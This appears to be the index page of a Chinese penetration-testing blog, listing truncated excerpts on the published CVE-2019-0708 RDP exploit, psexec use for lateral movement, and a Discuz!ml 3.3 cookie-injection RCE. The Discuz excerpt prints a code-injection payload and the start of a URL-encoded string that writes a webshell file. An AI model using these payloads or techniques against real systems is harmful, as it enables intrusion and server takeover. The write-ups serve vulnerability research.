News:禁止使用本博客的技术文章、源码、工具等用于非法用途,否则后果自负。

The Lastest

安全动态,渗透测试,漏洞研究

CVE-2019-0708远程桌面代码执行漏洞EXP被公开

jasonx 1079 0

前言Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,windows2003、windows2008、windows2008 R2、windows xp、win7等系统都会遭到攻击,该服务器漏洞利用方式是通过远程桌面端口RDP协议进行攻击。9月7日 号称比肩MS17-010漏洞(CVE-2019-0708)的利用EXP被公开。Metasploit在推特上发布了漏洞利用视频和exp。目前各位大佬和安...

渗透测试,内网渗透

内网渗透中PSTools套件的使用

jasonx 861 1

前言我本人在内网渗透中,经常会用到PSTools。在内网中很多win7电脑,知道对方密码但无法直接远程登录的情况下,psexec的优势就体现出来了。psexec.exepsexec.exe是一个远程执行工具,知道对方账号密码即可远程执行命令,运行程序等等。常用参数说明-u 输入对方用户名-p 输入对方密码-d 无需等待程序执行完,直接返回。-s 以system权限运行-i 让对方看到你运行的程序窗口-c 运行对方电脑里...

漏洞研究

Discuz!ml3.3前台命令执行漏洞 可getshell

jasonx 1114 1

代码执行访问127.0.0.1/home.php,访问其他文件也可以。cookie字段中会出现xxxx_xxxx_language字段,根本原因就是这个字段存在注入,导致的RCE抓包找到cookie的language的值修改为xxxx_xxxx_language=sc'.phpinfo().' getshell%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%...